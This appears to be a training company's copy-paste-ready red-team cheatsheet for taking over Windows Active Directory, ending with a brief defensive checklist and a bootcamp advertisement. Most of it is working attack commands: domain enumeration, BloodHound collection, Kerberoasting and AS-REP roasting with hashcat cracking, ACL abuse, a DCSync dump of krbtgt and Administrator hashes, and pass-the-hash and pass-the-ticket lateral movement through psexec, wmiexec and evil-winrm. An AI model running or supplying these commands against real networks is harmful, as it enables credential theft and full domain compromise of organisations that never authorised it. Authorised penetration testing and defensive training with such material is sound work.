Active Directory remains the centre of gravity for every Windows enterprise in 2026. Almost every red-team engagement that breaks past the perimeter ends in Domain Admin via the same handful of techniques. This is the cheatsheet our consultants reach for during BFSI and government engagements — copy-paste-ready, with the why next to the what.
Recon — what's in the domain
Get-NetDomain
Get-NetDomainController
Get-NetUser -SPN
Get-NetGroup "Domain Admins" -FullData
Get-NetGroupMember -GroupName "Domain Admins" -Recurse
Get-NetComputer -OperatingSystem "*Server 2012*"
Get-NetSession -ComputerName <DC>
Find-LocalAdminAccess# Discover DCs
nmap -p 88,389,445,636 -sV <subnet>
# Enumerate users via SAMR
impacket-samrdump <user>:<pass>@<DC>
# Anonymous enumeration where allowed
impacket-lookupsid anonymous@<DC>
# Get domain SID + trusts
ldapsearch -x -H ldap://<DC> -b "DC=corp,DC=local" "(objectClass=trustedDomain)"BloodHound — find the path
# From Windows
SharpHound.exe -c All --zipfilename loot.zip
# From Linux
bloodhound-python -u <user> -p <pass> -d corp.local -ns <DC> -c All- Shortest paths to Domain Admins
- Kerberoastable users with high-privilege paths
- Computers where Domain Users have local admin
- ACL chains: GenericAll / WriteDACL / WriteOwner abuse
- GPO abuse paths via WriteProperty on linked GPOs
Kerberoasting
Service accounts with SPNs let any authenticated user request a TGS encrypted with the service account's NTLM hash, which is then crackable offline. Still by far the highest hit-rate finding in BFSI engagements.
# Request tickets
impacket-GetUserSPNs corp.local/<user>:<pass> -dc-ip <DC> -request -outputfile spns.txt
# Crack
hashcat -m 13100 spns.txt /usr/share/wordlists/rockyou.txt --forceAS-REP roasting
impacket-GetNPUsers corp.local/ -usersfile users.txt -dc-ip <DC> -no-pass -outputfile asrep.txt
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt --forceACL abuse
| ACE | Effect | Tool |
|---|---|---|
| GenericAll | Full control of object | PowerView, Set-DomainObject |
| GenericWrite | Write any property (e.g. SPN, logon script) | Set-DomainObject |
| WriteDACL | Modify object's ACL → grant self GenericAll | PowerView |
| WriteOwner | Take ownership → grant ACL | PowerView |
| WriteProperty (msDS-AllowedToActOnBehalfOfOtherIdentity) | RBCD relay | Rubeus + Rbcd |
| AllExtendedRights | Force password reset on user | Set-DomainUserPassword |
Common abusable ACEs and what they grant
DCSync — the keys to the kingdom
impacket-secretsdump -just-dc-user krbtgt corp.local/<admin>:<pass>@<DC>
impacket-secretsdump -just-dc-user Administrator corp.local/<admin>:<pass>@<DC>Lateral movement quick reference
# PtH
impacket-psexec corp.local/<user>@<host> -hashes :<NTLM>
# PtT (after Rubeus dump or impacket-getTGT)
export KRB5CCNAME=ticket.ccache
impacket-psexec -k -no-pass <host>.corp.local
# WMI
impacket-wmiexec corp.local/<user>:<pass>@<host>
# WinRM
evil-winrm -i <host> -u <user> -p <pass>Defensive checklist (for the blue team reading this)
- Disable RC4 etypes on all KDCs
- Move every service account to gMSA where possible
- LAPS for all local admin passwords
- Tier 0 / 1 / 2 admin separation with PAW workstations
- Alert on TGT renewal anomalies, RC4 TGS requests, lsass handle access
- Monthly Bloodhound runs from your own DC to catch ACL drift
Our OSCP-aligned AD bootcamp is one of several hands-on tracks Macksofy delivers across India and the UAE. CERT-In empanelled, OffSec/EC-Council authorized, with weekend cohorts and corporate batches.